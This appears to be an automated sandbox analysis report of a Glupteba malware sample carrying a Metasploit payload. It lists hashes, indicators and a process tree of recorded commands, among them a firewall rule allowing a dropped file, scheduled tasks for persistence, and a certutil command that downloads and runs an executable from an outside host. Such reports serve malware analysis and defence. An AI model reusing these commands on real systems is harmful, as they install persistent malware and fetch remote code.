Analysis
-
max time kernel
128s -
max time network
93s -
platform
windows10-2004_x64 -
resource
win10v2004-20220718-en -
resource tags
arch:x64arch:x86image:win10v2004-20220718-enlocale:en-usos:windows10-2004-x64system -
submitted
20-07-2022 19:32
Static task
static1
Behavioral task
behavioral1
Sample
4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe
Resource
win10v2004-20220718-en
General
-
Target
4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe
-
Size
3.8MB
-
MD5
827759386f54f0b296fc04902e9da469
-
SHA1
dd96acff5064c40e1b5b95d072d844723566703c
-
SHA256
4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6
-
SHA512
d6c61c99a95e68505e13ff596914c99c7297e05bc45ee4e59a06272c037fcd80c2094e3ed0772e60bcc0428d4e4b71340e48b1091cd2aadea376cc7e93f3bc8e
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba payload 8 IoCs
Processes:
resource yara_rule behavioral2/memory/2044-131-0x0000000001710000-0x0000000001F14000-memory.dmp family_glupteba behavioral2/memory/2044-132-0x0000000000400000-0x0000000000C50000-memory.dmp family_glupteba behavioral2/memory/2044-134-0x0000000000400000-0x0000000000C50000-memory.dmp family_glupteba behavioral2/memory/1284-138-0x0000000000400000-0x0000000000C50000-memory.dmp family_glupteba behavioral2/memory/1284-142-0x0000000000400000-0x0000000000C50000-memory.dmp family_glupteba behavioral2/memory/4336-144-0x0000000001A00000-0x0000000002204000-memory.dmp family_glupteba behavioral2/memory/4336-147-0x0000000000400000-0x0000000000C50000-memory.dmp family_glupteba behavioral2/memory/4336-151-0x0000000000400000-0x0000000000C50000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid process target process PID 4584 created 2044 4584 svchost.exe 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe PID 4584 created 4336 4584 svchost.exe csrss.exe PID 4584 created 4336 4584 svchost.exe csrss.exe PID 4584 created 4336 4584 svchost.exe csrss.exe -
Executes dropped EXE 2 IoCs
Processes:
csrss.exepatch.exepid process 4336 csrss.exe 2656 patch.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2783062828-828903012-4218294845-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BlackSun = "\"C:\\Windows\\rss\\csrss.exe\"" 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 1376 bcdedit.exe -
Drops file in Windows directory 2 IoCs
Processes:
4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exedescription ioc process File created C:\Windows\rss\csrss.exe 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe File opened for modification C:\Windows\rss 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3760 schtasks.exe 3084 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" csrss.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.execsrss.exepid process 2044 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe 2044 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe 1284 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe 1284 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe 4336 csrss.exe 4336 csrss.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exesvchost.execsrss.exedescription pid process Token: SeDebugPrivilege 2044 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe Token: SeImpersonatePrivilege 2044 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe Token: SeTcbPrivilege 4584 svchost.exe Token: SeTcbPrivilege 4584 svchost.exe Token: SeBackupPrivilege 4584 svchost.exe Token: SeRestorePrivilege 4584 svchost.exe Token: SeBackupPrivilege 4584 svchost.exe Token: SeRestorePrivilege 4584 svchost.exe Token: SeSystemEnvironmentPrivilege 4336 csrss.exe Token: SeBackupPrivilege 4584 svchost.exe Token: SeRestorePrivilege 4584 svchost.exe Token: SeBackupPrivilege 4584 svchost.exe Token: SeRestorePrivilege 4584 svchost.exe Token: SeBackupPrivilege 4584 svchost.exe Token: SeRestorePrivilege 4584 svchost.exe Token: SeBackupPrivilege 4584 svchost.exe Token: SeRestorePrivilege 4584 svchost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
svchost.exe4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.execmd.execsrss.exedescription pid process target process PID 4584 wrote to memory of 1284 4584 svchost.exe 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe PID 4584 wrote to memory of 1284 4584 svchost.exe 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe PID 4584 wrote to memory of 1284 4584 svchost.exe 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe PID 1284 wrote to memory of 2924 1284 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe cmd.exe PID 1284 wrote to memory of 2924 1284 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe cmd.exe PID 2924 wrote to memory of 4596 2924 cmd.exe netsh.exe PID 2924 wrote to memory of 4596 2924 cmd.exe netsh.exe PID 1284 wrote to memory of 4336 1284 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe csrss.exe PID 1284 wrote to memory of 4336 1284 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe csrss.exe PID 1284 wrote to memory of 4336 1284 4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe csrss.exe PID 4584 wrote to memory of 3760 4584 svchost.exe schtasks.exe PID 4584 wrote to memory of 3760 4584 svchost.exe schtasks.exe PID 4584 wrote to memory of 3084 4584 svchost.exe schtasks.exe PID 4584 wrote to memory of 3084 4584 svchost.exe schtasks.exe PID 4584 wrote to memory of 2656 4584 svchost.exe patch.exe PID 4584 wrote to memory of 2656 4584 svchost.exe patch.exe PID 4336 wrote to memory of 1376 4336 csrss.exe bcdedit.exe PID 4336 wrote to memory of 1376 4336 csrss.exe bcdedit.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe"C:\Users\Admin\AppData\Local\Temp\4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe"C:\Users\Admin\AppData\Local\Temp\4ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:4596 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:3760 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:3084 -
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
PID:2656 -
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:1376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4584
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
Filesize
3.8MB
MD5827759386f54f0b296fc04902e9da469
SHA1dd96acff5064c40e1b5b95d072d844723566703c
SHA2564ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6
SHA512d6c61c99a95e68505e13ff596914c99c7297e05bc45ee4e59a06272c037fcd80c2094e3ed0772e60bcc0428d4e4b71340e48b1091cd2aadea376cc7e93f3bc8e
-
Filesize
3.8MB
MD5827759386f54f0b296fc04902e9da469
SHA1dd96acff5064c40e1b5b95d072d844723566703c
SHA2564ddac6c524c1b98a71080bab908cfb0dc8f4935e379206985a1b737e32fcfef6
SHA512d6c61c99a95e68505e13ff596914c99c7297e05bc45ee4e59a06272c037fcd80c2094e3ed0772e60bcc0428d4e4b71340e48b1091cd2aadea376cc7e93f3bc8e